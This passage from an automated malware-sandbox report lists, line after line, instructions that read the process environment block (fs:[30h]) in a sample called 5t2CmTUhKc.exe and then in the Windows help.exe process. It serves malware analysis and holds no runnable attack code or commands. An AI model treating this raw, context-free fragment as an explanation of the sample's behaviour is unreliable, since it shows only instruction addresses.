          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B1927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B64257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B9138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B8D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B9131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B88DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B5A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B13D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B53540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
